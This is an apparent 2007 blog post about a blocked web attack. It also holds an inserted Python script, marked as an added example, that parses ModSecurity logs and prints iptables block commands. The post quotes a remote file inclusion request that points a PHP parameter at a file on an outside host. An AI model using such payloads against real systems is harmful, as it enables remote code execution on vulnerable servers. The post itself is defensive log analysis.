Tuesday, January 16, 2007

I saw someone hammering my web server

I saw someone hammering my web server today and yesterday. He/she generated 196 Snort alerts, which is quite a bit for my server. The cool thing is, the attack got nowhere, for two reasons:

1. The server doesn't run PHP or CGI, and the attack targets a PHP script: it tries to make /calendar/index.php include a file from a remote host through the inc_dir parameter (a remote file inclusion attempt), which can't work on a server that never hands the request to PHP.

2. I use ModSecurity, which is a web application firewall module for Apache.

See payload below (ModSecurity):

Request: midas.slackware.lan 198.145.244.232 - - [15/Jan/2007:21:04:18 -0500] "GET /calendar/index.php?inc_dir=http://200.75.9.114/C.php?&/ HTTP/1.1" 403 304 "-" "Morfeus Fucking Scanner" RawyokKgjR4AAFL7qwU "-"
----------------------------------------
GET /calendar/index.php?inc_dir=http://200.75.9.114/C.php?&/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-us
Connection: Close
Host: 66.160.141.30
User-Agent: Morfeus Fucking Scanner
mod_security-message: Access denied with code 403. Pattern match "index.php" at REQUEST_URI [id "1005"][rev "2"] [msg "index.php usage, suspicious activity"] [severity "ALERT"]
mod_security-action: 403

HTTP/1.1 403 Forbidden
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1

The activity triggered a rule I created (yeah, ModSecurity is rule-based). I know I don't use PHP but I'd still like to see such attacks on my network, as a heads-up to escalated attacks. What I don't have is a reactive firewall, one that blocks traffic such as this automatically. I had to add the IP to my block list by hand, which sucks.
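The manual step described above (read the ModSecurity log, spot the remote file inclusion attempt, add the source IP to the block list) is the kind of thing a few lines of script can do for you. The following is an added example of my own, not the author's code and not part of ModSecurity: it parses the "Request:" summary line in the format shown in the log above, flags any query parameter whose value is itself a URL (the remote file inclusion signature), and prints an iptables DROP command per offending source. The sample log text is constructed (the first line is the one from the post, the second is a made-up benign request), and iptables is an assumed block mechanism, since the post doesn't say what the author's block list is.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl

# Constructed sample input: the audit-log "Request:" line from the post plus
# one made-up benign request, so the script runs offline.
SAMPLE_LOG = """\
Request: midas.slackware.lan 198.145.244.232 - - [15/Jan/2007:21:04:18 -0500] "GET /calendar/index.php?inc_dir=http://200.75.9.114/C.php?&/ HTTP/1.1" 403 304 "-" "Morfeus Fucking Scanner" RawyokKgjR4AAFL7qwU "-"
Request: midas.slackware.lan 192.0.2.7 - - [15/Jan/2007:21:05:02 -0500] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0" abcd1234 "-"
"""

# Fields of the "Request:" summary line: vhost, client IP, ident, user,
# timestamp, request line, status, size, referer, user agent.  The trailing
# unique id and extra "-" are ignored (the regex is anchored at the start only).
REQUEST_RE = re.compile(
    r'^Request: (?P<vhost>\S+) (?P<ip>\S+) \S+ \S+ '
    r'\[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"'
)

# A parameter value that is itself a URL is the signature of a remote file
# inclusion attempt: the attacker hopes the script passes it to include().
URL_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)


def parse_request_line(line):
    """Return the named fields of one audit-log Request line, or None."""
    m = REQUEST_RE.match(line)
    return m.groupdict() if m else None


def rfi_params(request):
    """Return (name, value) pairs from the query string whose value is a remote URL."""
    parts = request.split(" ", 2)          # METHOD TARGET VERSION
    if len(parts) < 2:
        return []
    _path, _, query = parts[1].partition("?")
    pairs = parse_qsl(query, keep_blank_values=True)
    return [(name, value) for name, value in pairs if URL_RE.match(value)]


def analyze(log_text):
    """Return one finding per Request line that carries an RFI payload."""
    findings = []
    for line in log_text.splitlines():
        fields = parse_request_line(line)
        if not fields:
            continue
        hits = rfi_params(fields["request"])
        if hits:
            findings.append({
                "ip": fields["ip"],
                "ts": fields["ts"],
                "ua": fields["ua"],
                "status": int(fields["status"]),
                "rfi": hits,
            })
    return findings


def block_commands(findings, threshold=1):
    """iptables commands for every source seen at least `threshold` times.

    Assumed block mechanism: an iptables DROP rule is one common way to make
    the block list reactive; the post does not say what the author uses.
    """
    counts = Counter(f["ip"] for f in findings)
    return [f"iptables -I INPUT -s {ip} -j DROP"
            for ip, n in sorted(counts.items()) if n >= threshold]


if __name__ == "__main__":
    results = analyze(SAMPLE_LOG)
    for f in results:
        print(f'{f["ts"]} {f["ip"]} status={f["status"]} ua="{f["ua"]}" rfi={f["rfi"]}')
    for cmd in block_commands(results):
        print(cmd)
```

Run it against the real audit log instead of SAMPLE_LOG and pipe the output to a shell to get the automatic block the post asks for. The threshold argument is there so a single scanner hit on a misconfigured but legitimate client doesn't lock it out; one match is enough for a payload like the one above, but raise it if you also feed the script Snort alerts.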

ModSecurity also has a web-based console that I haven't figured out how to use yet, so I usually parse the flat logs manually, then correlate any malicious traffic with my firewall and Snort logs to get a better picture of questionable activity. Once I figure out how to get the web-based console up and running, I'll let you know and maybe throw together a how-to on using ModSecurity on Slackware.